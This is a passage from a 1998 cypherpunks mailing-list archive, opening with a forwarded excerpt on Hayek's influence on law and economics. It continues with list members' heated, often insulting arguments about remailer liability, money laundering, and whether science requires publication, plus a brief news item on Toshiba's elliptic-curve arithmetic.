 response to a socialist ethos that permeated the European continent
and endangered the liberal underpinnings of English politics. The goal
of the book was to sound a "warning to the socialist intelligentsia of
 England"45 that their program would lead to the very totalitarianism
so many had fought against.  Despite its focus on the English
intellectual scene, the book had an enormous impact in the
United States.46 In fact, it produced a more extreme reaction,
both positive and negative, in the United States than in England.

No doubt part of the consternation on the American left was due
to the boldness and scope of Serfdom.47 While the argument that
"hot socialism" would poison a society might not have unsettled
leftists, Hayek made similar claims regarding the welfare state.48
The problem articulated in Serfdom was that some of the core
beliefs of hot socialism had become so embedded in the conceptual
framework of intellectual thought that they threatened to undermine
liberal society under the guise of the welfar state or egalitarian rhetoric.
This would come, for example, in the form of knee-jerk calls for
state/bureaucratic intervention in the economy when "judicious
use of financial inducements might evoke spontaneous efforts."49

The polemical force of Serfdom stemmed from its evocation of the
 dangers of totalitarianism, particularly the Nazi Germany variety,
manifest in social approaches to the ills that befall society.  Hayek
boldly and flatly asserted that "[i]t is necessary now to state the
unpalatable truth that it is Germany whose fate we are in some
danger of repeating."50  The core of the antistatist stance as
 articulated in Serfdom grew out of the belief in the uniqueness
of individual activity and thought ("ethical individualism"). It was
 unacceptable, in fact impossible, for anyone other than the
individual to make decisions for the individual without imposing
 an alien set of values. At that point, seemingly benign policy
 prescriptions dissolved into naked, unjustifiable coercion. Thus,
 "individuals should be allowed, within defined limits, to follow their
own values and preferences rather than somebody else's."51
In the antigovernment sentiment and proincentive policies
articulated in Serfdom, we see the ideological seeds that helped
influence, but were not determinative of, the American law
and neoclassical economics movement. The ways in which the
antistatist ideal set forth in Serfdom would be reflected in
social institutions are clear in Hayek's discussion of the
legal system and are fundamental in linking his intellectual
project to the law and neoclassical economics movement.
Hayek's views on the legal system were shaped by his core
belief that "competition" is the central means of "co-ordinating
human effort" and the "conviction that, where effective
competition can be created, it is a better way of guiding
individual efforts than any other."52 Thus, in the effort to
protect the individual, it is free market competition, not
government intervention, that is presumed to be for the good.
So, what of the law "[I]n order that competition should work
beneficially, a carefully thought-out legal framework is required. ."
In particular, some legal structure may be needed in order
to accurately reflect the price of goods and services, which
is the vital information for individuals.53 In sum, the law
serves to facilitate competition, which is the system most
conducive to individual freedom. It does so by setting the
boundaries of competition.  The law should "recognize the
principle of private property and freedom of contract." In this
 regard, it acts as a neutral arbiter facilitating individual
preferences and defining the "right to property as applied
to different things." The rights associated with property,
notwithstanding antistatist ideals, were not absolute, but
contingent upon the particular situation. Efficiency was
the criterion: the "systematic study of the forms of legal
institutions which will make the competitive system work
efficiently." Regarding legal rules specifically, Serfdom
articulated a system in which "[t]he only question . . . is
whether in the particular instance the advantages gained
are greater than the social costs which they impose."54
Hayek's emphasis on legal rules, particularly as they affected
social costs,55 is the link connecting him to the law and
neoclassical economics movement.

Hayek gave a detailed analysis of social costs and the limits
of government intervention as a tool for minimizing such costs.
However, to the extent that legal rules limiting property rights
represent an activist role for government, Hayek stated that,
 though the scope of this permissible intervention on individual
autonomy was not defined, "these tasks provide, indeed, a
wide and unquestioned field for state activity."56 I argue below
 that the possibility of "state activity" within neoclassical
economics provides the ground for progressive political
appropriation of neoclassical economics.

This discussion of postwar antistatism, as represented by
Serfdom, and its logical progression to concrete neoclassical
analyses of legal institutions, specifically property rights,
begins to substantiate the first major claim of this essay:
law and neoclassical economics is, at its core, about politics.
 It also shows how the conservative politics associated with
neoclassical economics could be taken seriously if the
dangers of progressivism articulated in Serfdom, including
progressive ideals espoused by pragmatic instrumentalists,
were heeded.57 Now we turn to the connections between
neoclassical economics and the science of the analytic turn
in order to begin establishing the other claim of this paper:
law and neoclassical economics is, at its core, also about
science. At the end, we find that there is a synthesis of the
politics and science of law and neoclassical economics .. "


>From "Law and Neoclassical Economics: Science, Politics, and
the Reconfiguration of American Tort Law Theory" by James R. Hackney, Jr.
Law and History Review.  Vol. 15, No. 2, Fall 1997


>From "'Law and Neoclassical Economics': A Response
to Commentaries 163-172"  by James R. Hackney, Jr.:

" .. I never identify Hayek as a "neoclassical economist" but
I think it is (1) fair to say that Hayek, and Austrian economics
generally, have had considerable influence on neoclassical theory;16
and, more importantly for my thesis, (2) Hayek has had a
profound influence on the strand of law and neoclassical economics
coming out of the University of Chicago.17  (footnote 17. Coase's
recognition of his intellectual debt to F. A. Hayek and the
institutional role Hayek played in establishing law and neoclassical
economics studies at the University of Chicago is illustrative
of this point. Hackney, "Law and Neoclassical Economics,"
284, n. 42, 306, n. 141.) .. "

>From "'Law and Neoclassical Economics': A Response to Commentaries
 163-172" by James R. Hackney, Jr.  _Law and History Review_ Vol. 16, No. 1,
Spring 1998.



Hayek on the Web is a regular feature of the Hayek-L list.

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com), Philodox
e$, 44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
The e$ Home Page: http://www.shipwright.com/
Ask me about FC98 in Anguilla!: <http://www.fc98.ai/>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Fri, 9 Jan 1998 08:28:42 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Remailers & N.E.T.
In-Reply-To: <3.0.3.32.19980108004628.03b6bbe8@mail.atl.bellsouth.net>
Message-ID: <v03007806b0db101f982c@[168.161.105.216]>
MIME-Version: 1.0
Content-Type: text/plain



I would be very afraid of relying on the CDA's immunizing provisions as my
sole defense against prosecution, conviction, and jail time, were I a
remailer operator.

-Declan


At 12:47 -0800 1/8/98, Tim May wrote:
>(Though the SPA and others may then go after the remailers. Ironically, the
>CDA exempted remailers--though not by name--from liability for messages.)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jalonz@openworld.com
Date: Fri, 9 Jan 1998 09:05:24 +0800
To: Tim May <cypherpunks@toad.com
Subject: Re: Jalon'sWorld and Evil Money Laundering
Message-ID: <85256586.0081E136.00@openworld.com>
MIME-Version: 1.0
Content-Type: text/plain




>>Notice the words "criminal investigations"? God forbid talent could
>>actually be used for a good cause. The incidents in question were
actually
>>quite serious (Chinese mafia money laundering via phony real estate
deals)
>>and not at all like the porno bbs confiscation crap you'd be thinking of.
>And what is morally wrong with "money laundering"? Seems to me a person's
>money is his to do with it as he pleases...it's only governments that call
>some actions "money laundering." Just as they call some speech
"information
>laundering."
I personally dont see money laundering as a "bad" thing, but fraud
definitely is. What you do with your money is your business as long as you
dont hurt someone else. This was not the case. (IMHO)

>And do you think your "Digital Society" notion (which we've seen many
times
>before, usually involving floating, offshore entities) will somehow not
>attract or involve "Chinese mafia money launderers"?
I'm sure it will.

>Do you plan to implement key escrow so you can monitor what your residents
>are doing with each other? Do you plan to become a floating police state
so
>as to stop this evil "money laundering"?
Hell no, I personally do not think it would not be practical, moral or
cost-effective to use key-escrow methods. Key escrow empowers governments,
not individuals - at the cost of the individuals right to privacy.

>I don't think you've quite grasped the significance of strong crypto and
>cyberspace.
has anyone?

>(For starters, an intentional community in cyberspace, situated in no
>particular country, and backed by strong crypto, digital escrow systems
>(real escrow, of course), reputation systems, etc. is a far better place
to
>do business of certain sorts than is "Jalon'sWorld.")
Then why doesn't someone do it? Like I said we have to start somewhere.

>I suspect that Guy is right, that your "Digital Society" shtick is just
the
>latest in your long series of "new businesses" started in many places in
>the country.

Well it definitely is the latest and it definitely is one of many, so your
suspicions are correct.

BTW, The Digital Society Group has been selected to deploy the entire
Digital Society Package within the new Agulhas Bay Free Zone in the
People's Democratic Republic of Sao Tome and Principe.

I'd advise a look at the new content on the Digital Society website.


:)
Jalon

---------------------------------------------------------------
Jalon Q. Zimmerman, Director
The Digital Society Group
A division of Openworld, Inc.

http://www.openworld.com/
jalonz@openworld.com
---------------------------------------------------------------
The government is not your mommy.
---------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Fri, 9 Jan 1998 12:18:51 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: rant on the morality of confidentiality
In-Reply-To: <v03102800b0dac9cd1f90@[207.167.93.63]>
Message-ID: <3.0.5.32.19980108190521.007b87d0@otc.net>
MIME-Version: 1.0
Content-Type: text/plain



At 04:42 PM 1/8/98 -0800, Vladimir Z. Nuri wrote:
>good lord, no wonder 
>Ayn Rand is so uninfluential.
>

Methinks you are either tweaking us or 
are ourselves some 20 years ago..

Assuming the latter.
Howdy.  Calm down.  Everyone eventually
considers the Faustian bargains one finds
in one's environment, and realizes the 
bargains that others have made.  And one
chooses.  The universe owes you nothing.
Your goals and alliances are yours to choose.

Everyone picks what they are comfortable with, and it ain't your business
what they decide.  No one is
obligated to agree with you.  And  everyone is
obligated to let you alone, unless you violate their
right to be left alone.  But you know this.

If there are people w/ evil (and there are), well, stop tirading and deal
with it.   Route around the damage. You're not going to convince them, face
it.  Don't fill yourself with hate; mobilize.
Run for congress; send spoofmail from the pres;
write cryptocode; turn your grandma on to PGP;
volunteer to lecture to impressionable youngsters.

Once you get over the shock of realizing how
much things are not what they are supposed to be,
you'll be able to calm down, and think.  I'm not
an optimist but we have physics and mathematics
and economics in our favor, to paraphrase.

There *is* a reason to flame but flaming to the 
choir (or to the unbelievers, for that matter) 
isn't the solution.

On secrecy, Saint Chas. Darwin sat on evolution forever, until he reviewed
a paper that was going to scoop him, you know.  

later,





David Honig 			honig@alum.mit.edu
---------------------------------------------------
If we can prevent the government from wasting the labours of the people
under the pretense of
 caring for them, they will be happy.  -TJ





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 9 Jan 1998 11:45:45 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: rant on the morality of confidentiality
In-Reply-To: <v03102800b0dac9cd1f90@[207.167.93.63]>
Message-ID: <v03102800b0db4767dae7@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 4:42 PM -0800 1/8/98, Vladimir Z. Nuri wrote:
>every respondent to my post has missed the key points.
>I will post soon the list an article demonstrating my
>anger at the betrayal of sound government by a sinister state
>that has hijacked it.

Have they begun torturing you with the snakes of Medusa yet?

...
>if so, they are not SCIENTISTS. a key aspect of SCIENCE is publishing
>results. science cannot advance without it. name me one scientist
>who did not publish an important result, or is considered a good
>scientists for doing so!

"Name me one..."? How about Gauss, who didn't publish many of his results.
Or, of course, Fermat, ironically linked to Wiles.

Not to mention Darwin, who sat on his results for almost 20 years, and only
issued a paper and his famed book because he learned another naturalist was
about to announce similar conclusions.

Publication and, more importantly, discussion and challenge, is often very
important to the advancement of science. But is some cast in stone
requirement? Of course not.

>>Science does not "only advance through the open literature." There are many
>>other checks and balances which accomplish the same effect.
>
>name one.

Building an artifact which embodies the science, for example. Exploding an
atom bomb was pretty clearly a demonstration that the science done was
correct, regardless of whether there was "open literature" or not.

This is just too easy, refuting Detweiler's points. So I'll stop here.

>all this is uninteresting to me-- I was making a moral point in an
>essay that is obviously unintelligable to most people here. its my
>big mistake in this world, to pretent that morality plays a role.
>as EH once said, normative philosophies are a waste of time. what
>room does the world have for someone who thinks only in terms
>of how things should be? things ARE, PERIOD. good lord, no wonder
>Ayn Rand is so uninfluential.


I suggest he get his lithium prescription refilled.

--Tim May




The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 9 Jan 1998 09:54:25 +0800
To: cypherpunks@cyberpass.net
Subject: Fast Elliptic Curve Math
Message-ID: <1.5.4.32.19980109005031.010beb24@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



 7 January 1998, Nikkei Industrial Daily

 Toshiba Unveils Fast Formula For Elliptic-Curve Cryptography 

 Tokyo -- Toshiba Corp. has developed an arithmetic formula which it claims 
 offers the world's fastest processes of elliptic-curve cryptography. The 
 formula cuts processing time by almost half from current methods used in 
 elliptic-curve systems. 

 Toshiba's formula is based on the Montgomery arithmetic system, a special
 method of calculation which requires no division. 

 Elliptic-curve cryptography is considerably faster than the Rivest Shamir 
 Adleman (RSA) system currently in common use. 

 Toshiba hopes to apply the system in a wide range of fields, including 
 corporate information systems and electronic commerce. 

 -----

Is there other information on this?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@REPLAY.COM>
Date: Fri, 9 Jan 1998 04:05:24 +0800
To: cypherpunks@cyberpass.net
Subject: Re: cypherpunks and guns
Message-ID: <199801081855.TAA05464@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



> > Final comment: If I find the motivation, I may finish an essay I've been
> > working on about how we, the Cypherpunks and the World, are *retrogressing*
> > in crypto areas. Most of the exotic applications are no longer being
> > discussed, and various mundane commercial products are the main focus. Yawn.
> 
>         You mean things like Onion Routers, Crowds & the like?

Tim May doesn't know anything about Onion Routers, Crowds, or any of
the other new privacy technologies like Adam Back's prototype Eternity
service.  In truth, he has lost all interest in cryptography and now spends
his time talking about guns and making racist comments.

He wonders why the cypherpunks list no longer attracts quality
cryptographic ideas.  He need look no farther than the nearest mirror.
His violent rants and his off-topic, offensive posts have done more than
anything to drive good people off the list.

The single best thing that could happen to the cypherpunks list (and the
cypherpunks movement, for that matter) would be for Tim May to leave the
list and disassociate himself from the cypherpunks.  He would be much
more comfortable joining the KKK and the local militia.  After him,
Paul Bradley, William Geiger and Dimitri Vulis can follow.

This will leave fine thinkers with good hearts like Adam Back, Bill
Stewart, Wei Dai and others, people who still believe that cryptography
can make a strong contribution to our freedom.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Fri, 9 Jan 1998 10:38:04 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: rant on the morality of confidentiality (fwd)
Message-ID: <199801090201.UAA06101@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: Re: rant on the morality of confidentiality 
> Date: Thu, 08 Jan 98 16:42:43 -0800
> From: "Vladimir Z. Nuri" <vznuri@netcom.com>

> every respondent to my post has missed the key points.

Not quite. Of course I don't agree with all of them either. There are two
rules you should consider:

 -  It's ok to have an open mind, just don't let it slosh out on the
    ground.

 -  Understanding a view is not equivalent to supporting a view.

You might also want to consider that two opposing views might very well
*both* be right...it depends on where you sit on the fence as to what the
tree looks like.

> >Scientists even in schools and foundations are often secretive, too.
> >
> >The notion that "science" is about blabbing one's latest discoveries or
> >theories is overly simplistic. Many scholars and scientists choose not to
> >publicize their work for years, or decades, or, even, never.
> 
> if so, they are not SCIENTISTS. a key aspect of SCIENCE is publishing
> results. science cannot advance without it. name me one scientist
> who did not publish an important result, or is considered a good
> scientists for doing so!

I must agree here. If a technologist (ie one who studies science for
profit, hence creating a technology) chooses not to publish their results
that is fine. However, a scientist is one who studies nature and its
interactions, profit is not and should not be a motive. Simplistic or not;
in fact some things are better understood when simplified (ala the
scientific principle). A scientist has an obligation to discuss and publish
their results for other scientists (and even technologist) when they are
reasonably sure their results will stand up to indipendant verification (a
critical issue in science, not in technology however).

Don't be confused by Timy's claim to be a scientist, he is a technologist at
heart. Many of his views and beliefs are motivated by issues of control *not*
curiosity.

> >Consider Andrew Wiles, Princeton math professor, and the prover of Fermat's
> >Last Theorem. He labored in secrecy for many years, only going public when
> >he felt his results were complete. (As it turned out, they were not, and he
> >needed another year or two to fill in some gaps.)
> 
> but he PUBLISHED his results, he gave a LECTURE on his findings. I am
> not saying that secrecy and science are mutually exclusive in this way.
> secrecy is a useful tool, I am not in general against secrecy. but
> secrecy can be ABUSED, and our government is ABUSING it. 

Further, the *reason* he was so secretive was because of the history of
failed attempts and early 'proofs' that later failed. He was motivated by
getting it right and ruining his reputation; not because he thought proving
Fermat's Last Theorem would provide him riches and laurels for the remainder
of his mortal coil.

> have you
> been following that Clinton was just fined $286,00 for lying to
> a judge?

Which means, per the Constitution, that he should be removed from office.
He broke a public trust and that means he looses any public station he
currently has and is barred from future office.

>  I could give
> >dozens of examples of where the open literature either did not exist or was
> >not used...and science still advanced.

Of course, this is a specious argument. If it was already in the literature
it wouldn't be science advancing (learning something that wasn't known
before). The whole point to science is to understand and explain what we see
and don't see that creates the cosmos we inhabit. Now if your point is that
Intel taking some trade secret only they are aware of and using this to make
quicker chips is science then you don't know a damn thing about science.

> but science eventually published the results.

It is *required* for doing 'science', it isn't for doing 'technology'. As a
matter of fact a little perusal of history demonstrates that science
requires open and unhindered dialog while technology requires closed
channels of communcication and mechanisms of control. A perfect current
example is the move to cloan humans. The guy, Creed?, is right "you can't
stop science"; you can however stop technology and businesses do every day.
Until that oocyte goes viable it's science, from that point on it's
technology.

> human endeavor. how can you argue with something so obvious?

You don't know Timmy very well do you...

> all this is uninteresting to me-- I was making a moral point in an
> essay that is obviously unintelligable to most people here. its my
> big mistake in this world, to pretent that morality plays a role.

Actualy your mistake is assuming that there is *one* morality. Don't fret
though. Just about everyone wants to jam everyone else into their nice
little easily understood molds. It makes it much easier to justify their
actions to themselves and potentialy to others if they get them to swallow
even once.

> of how things should be? things ARE, PERIOD. good lord, no wonder 
> Ayn Rand is so uninfluential.

Reasonable men don't change the world. If we aren't motivated by our ethics
and belief that our actions can change the world into the way it 'should be'
then what is the motive? Money? Even that is a veiled mechanism to make the
world the way we think it should be (ie we have more money or social station
than currently endowed with). Changing the world is what *makes* life worth
living. The question *is* why do you want to change the world and *who* gets
to profit by it?



    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
   |                                          John F. Kennedy           |
   |                                                                    |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Stutz <stutz@dsl.org>
Date: Fri, 9 Jan 1998 10:16:11 +0800
To: cypherpunks@cyberpass.net
Subject: Syn-l: Re: White House Or Red Roof Inn? (fwd)
Message-ID: <Pine.LNX.3.95.980108200434.5904m-100000@devel.nacs.net>
MIME-Version: 1.0
Content-Type: text/plain



[This message originally appeared on the synergetics-l at
<http://www.inetarena.com/~pdx4d/Synergetics-L/synl.html>, a list
for the discussion of R. Buckminster Fuller's magnum opus.] 

---------- Forwarded message ----------
Date: Fri, 09 Jan 1998 00:38:22 GMT
From: Kirby Urner <pdx4d@teleport.com>
Reply-To: synergetics-l@teleport.com
To: synergetics-l@teleport.com
Subject: Syn-l: Re: White House Or Red Roof Inn?
Newsgroups: alt.politics.org.fbi,alt.politics.org.cia

softwar@us.net (softwar@us.net) wrote:

>friends inside the White House.  Barth claimed the British were
>already selling encrypted radios to China and his new boss,
>Motorola, deserved a "level playing field".  In fact, according
>to Barth, the National Security Agency (NSA) agreed with
>Motorola's request for export.
>

I want to be clear on your position: you are apparently against
administration efforts to frustrate domestic access to strong 
encryption.  This makes sense, since that would just put the 
domestic population behind the rest of the world, which has 
access to same through other channels.

But are you saying companies like Motorola should not sell 
encrypted radio or television to clients not classified as 
"domestic"?  Or is it just some clients (e.g. the Chinese) 
but not others that you're saying Motorola should turn away.  

Sounds to me like you're picking on the Chinese because 
they're an easy target, after all the brouhaha about where 
the DNC has been getting its money (are you so sure the 
British have never helped put their preferred candidate in 
power through banking channels?  Is this really a new game?
I think not -- USAers just aren't used to having the Asians 
playing it, but in retrospect you have to wonder what took 
them so long).

My view is that we're fast coming to (already well passed?)
the point where we're going to have to regard lethal-against
-humans applications of high technology as uniformly negative 
wherever they occur -- exceptions will be few and far between.

Big money is seeing a secure path into the future, but not 
if high explosives are factored in as wild cards -- like 
you're trying to plan the motherboard of a computer and some 
politician comes in and says "by the way, every now and then 
we plan to blow a whole section of circuitry sky high, 
maybe explode a chip or two -- think you can handle that?"  
The Intel engineers I know would all shake their heads and 
think this guy must be missing more than a few screws.  

Computers need it cold. The temperature needs to keep dropping,
down, down, down -- to way below what jingoists and knee-jerk 
patriots of all stripes and coloration find comfortable, but 
which delicate high technology absolutely must have to operate 
with any integrity.  Motherboard Earth is not some Hollywood
movie set, where misguided Rambos can run amuk at will. Save
that stuff for the video parlor or the schoolyard, where 
it's safe to indulge in less than grown-up behavior.

If the Qualcomm kid was even inadvertently feeding data to 
GIS systems bound for the "brains" of Tomahawk cruise missles 
aimed at "external" (non-domestic) targets in another 
hemisphere, then Qualcomm is liable to go down in history as 
a felonious player, a villain.  One just can't afford to 
misrepresent one's true intentions so blatantly and expect 
to survive as trusted player.

Using GIS and GPS to make flying safer is a positive civilian
use of the technology, but if those planes are carrying 
weapons of mass destruction (armed and dangerous), then 
we're certainly going to follow the chain of command right 
to the top and find out exactly what logic is driving this 
design decision -- like why are you wearing a gun coming 
into a crowded civilian restaurant Mr. CEO President?  

People who want to flaunt terrifying weaponry had better 
come clean under interrogation, or own up to a "terrorist" 
charge -- applied without regard for skin color, creed, or 
place of origin.

The econosphere has become very sophisticated and techno-
logical, all the more delicate and sensitive as a result
of the human presence.  We could have a pretty good world 
here in fact, if we're willing to treat it with the respect 
owing any high precision instrument. People who plan to 
simply barrel ahead with lethal weapons planning, come 
what may, need to provide some iron clad logic for this 
course or their trackers and backers simply will kiss 
them good buy (and good riddance) for failing to offer 
any credible scenarios worth funding.  Big ticket 
weaponry just doesn't have that same sex appeal anymore, 
has "boondoggle" written on it even before they get off 
the drawing board. Like "who's gonna pay for this shit?"
is the first question smart money asks.

Best to not hide behind "national security" shields as in 
the past at this point, is what I advise the corporate 
R&D divisioins -- because now you know that security 
chiefs don't necessarily buy the company hype anymore.  
You better have it in writing where you got your orders, 
if you want to plead "not guilty" and pass the buck on 
up the line.

So if you want to play profitable commerical games in the 
civilian sector, don't be so sure your weaponry subsidiaries 
will escape scrutiny, and don't count on preferential 
enforcement of statutes to protect your namebrand from 
being utterly trashed if you turn out to be defrauding 
the very people you make such a noise about wanting to 
protect.  The people are waking up, some of them, and 
are finding out they don't like what's been taking place 
in their name.

Kirby

---------------------------------------------------------
Kirby T. Urner  http://www.teleport.com/~pdx4d/kirby.html
4D Solutions    http://www.teleport.com/~pdx4d/  [PGP OK]
---------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 9 Jan 1998 12:46:44 +0800
To: cypherpunks@Algebra.COM
Subject: Re: rant on the morality of confidentiality (fwd)
In-Reply-To: <199801090201.UAA06101@einstein.ssz.com>
Message-ID: <v03102801b0db59b6282a@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 6:01 PM -0800 1/8/98, Jim Choate wrote:

>Don't be confused by Timy's claim to be a scientist, he is a technologist at
>heart. Many of his views and beliefs are motivated by issues of control *not*
>curiosity.
....
>You don't know Timmy very well do you...

Add Choate to the list of dimbulbs who think calling me "Timmy" (or Timy)
is some kind of witty insult. On this list, Detweiler and Vulis seem to
favor this usage.

Next he'll be putting out ASCII art

Jeez, and I don't even recall insulting Choate. Perhaps he got his nose out
of joint when I challenged his "all snipers use .223" piece of
misinformation.

Back in my killfile he goes. Incredible that he is even connected with one
of the Cypherpunks distribution points.

BTW, nowhere in my piece did I refer to myself as a "scientist." I spoke of
Wiles, and then of Gauss, Fermat, and Darwin.

--Tim May

The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc <blancw@cnw.com>
Date: Fri, 9 Jan 1998 14:10:27 +0800
To: cypherpunks@cyberpass.net
Subject: Re: rant on the morality of confidentiality
Message-ID: <3.0.32.19980108220504.00707df8@cnw.com>
MIME-Version: 1.0
Content-Type: text/plain



NuriLogical is anguished that some people are immoral:

>all this is uninteresting to me-- I was making a moral point in an
>essay that is obviously unintelligable to most people here. its my
>big mistake in this world, to pretent that morality plays a role.
>as EH once said, normative philosophies are a waste of time. what
>room does the world have for someone who thinks only in terms
>of how things should be? things ARE, PERIOD. good lord, no wonder 
>Ayn Rand is so uninfluential.
.................................................................

As your hero and biggest fan, EH, said:  

cypherpunks do not wait for other people to become moral; cypherpunks
create their own reality.   (or something to that effect)

How can we know which flaw (for there are many possible) causes a person -
scientific or otherwise - to behave like a coward and give up their
integrity for the sake of safety or money or an undeserved reputation?

How can we know how someone could keep a contradiction in their head,
maintaining a position of virtue in the commuity while yet depending on the
slavery of those whose benefit they purport to be working for?

I guess you will tell us this in your forthcoming article.
(Perry, where are you when we need you?   
	 :>) just kidding!!)

BTW, you should consider that when Einstein proposed the creation of a
bomb, it was within the context of a war being advanced globally by an evil
madman who was gathering every resource to subdue and decimate everything
in his way, and that the rest of the world was desperate for a solution.

Also you should remember that some brilliant people, like Newton, who was a
shy man and didn't necessarily see himself as others did/do, did not care
if anyone else saw the results of his work.  Once he had solved the
problems in his own mind, he was not exceptionally concerned that others
were also struggling with the same, nor whether "the community" needed the
answer.   He was pursuing knowledge for reasons of his own. 

    ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 9 Jan 1998 12:11:54 +0800
To: cypherpunks@toad.com
Subject: Re: Jalon'sWorld and Evil Money Laundering
In-Reply-To: <85256586.0081E136.00@openworld.com>
Message-ID: <30s1ie11w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



jalonz@openworld.com writes:
> BTW, The Digital Society Group has been selected to deploy the entire
> Digital Society Package within the new Agulhas Bay Free Zone in the
> People's Democratic Republic of Sao Tome and Principe.

Cool.

Do you possibly happen to know a source for historical time series: Sa~o Tome
Dorba exchange rates to USD and also interest rates at different tenors?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Fri, 9 Jan 1998 12:20:30 +0800
To: cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: rant on the morality of confidentiality (fwd)
Message-ID: <199801090442.WAA06633@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 8 Jan 1998 19:26:11 -0800
> From: Tim May <tcmay@got.net>
> Subject: Re: rant on the morality of confidentiality

> "Name me one..."? How about Gauss, who didn't publish many of his results.
> Or, of course, Fermat, ironically linked to Wiles.

True, Gauss didn't publish many of his results and he wasn't famed for that
either. He *was* famed because he *did* publish some of his works. In fact,
if you study Gauss you find a insecure introvert who in general hated his
competition. He lied in his correspondance about work he supposedly did (see
his relations with Bolyai who was a friend of his from school -
"Non-euclidean Geometry" by Roberto Bonola; Dover ISBN 0-486-60027-0 $5.50).
Yes, Gauss was respected for his math, he was hated for his humanity, or
lack thereof. If anything Gauss' bahaviour held back science because of his
self-interest.

Fermat in general published most of his work, however, much of it was lost
including his proof. His statement was that it was too long to be written in
the margin of the book, not that he didn't write it down. The implication
being that he *had* written it down and it got misplaced or lost it.

Both of these folks are *very* poor examples of your point.

> Not to mention Darwin, who sat on his results for almost 20 years, and only
> issued a paper and his famed book because he learned another naturalist was
> about to announce similar conclusions.

Darwin set on his results because he was aware of the results of his work
and the consequence to his career. He felt he needed more stature and as a
consequence more security before publishing. He also understood he was right
and that the first to publish would go down in history and the second would
be an also ran. If you study the others alive at the time there were many
people who had suggested similar theories. His own uncle had written similar
material several decades before Darwin ever set foot on the Beagle. Darwin
didn't invent evolution, he did refine it. Further, Darwin *isn't* know in
the scientific community for his two books intended for lay readers. He *is*
known for his seminal study of finches and mollusks, both quite clearly
demonstrate his beliefs and theories and both had a much bigger impact on
the scientific acceptance of evolution than 'Species' ever hoped to have.
You are confusing the acceptance by the lay public as equivalent to
scientific acceptance. You really should read Mayr.

Again, a bad example.

> Publication and, more importantly, discussion and challenge, is often very
> important to the advancement of science. But is some cast in stone
> requirement? Of course not.

Actualy the open discussion of hypothesis and the testing thereof in open
and unbiased comparison by indipendant researchers *is* most certainly a
requirement in science - your protest not withstanding.

> Building an artifact which embodies the science, for example. Exploding an
> atom bomb was pretty clearly a demonstration that the science done was
> correct, regardless of whether there was "open literature" or not.

Don't confuse the science of atomic physics with the engineering of building
a bomb. They are not the same thing. The majority of the work done to
succesfuly understand an atomic bomb was known world wide in the 1920's
and early '30's. The engineering to do it along with the money and project
management skills motivated by the political where with all to actualy do it
didn't.

You are confusing affect and effect.

> This is just too easy, refuting Detweiler's points. So I'll stop here.

Thanks. My smashed finger is starting to hurt and your points are pretty easy
to refute as well.


    ____________________________________________________________________
   |                                                                    |
   |      Those who make peaceful revolution impossible will make       |
   |      violent revolution inevitable.                                |
   |                                                                    |
